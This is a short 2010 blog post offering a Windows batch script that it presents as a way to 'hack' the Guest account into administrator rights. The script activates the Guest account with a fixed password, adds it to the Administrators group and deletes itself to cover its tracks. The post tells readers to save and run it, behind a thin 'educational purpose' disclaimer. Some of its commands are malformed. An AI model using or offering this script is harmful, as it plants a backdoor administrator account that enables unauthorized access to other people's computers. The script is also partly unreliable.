Wednesday, November 17, 2010

Hack "GUEST" with Admin privileges........

Please Don't missuses This ARTICLE. Its meant for "Educational Purpose" only or for helping those who have lost their PASSWORD.

--------------Code Here---------------

echo off
title Please wait...
cls

net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest mahi /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add

del %0


--------------Code Here---------------

Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...




Enjoy!!!

No comments:

Post a Comment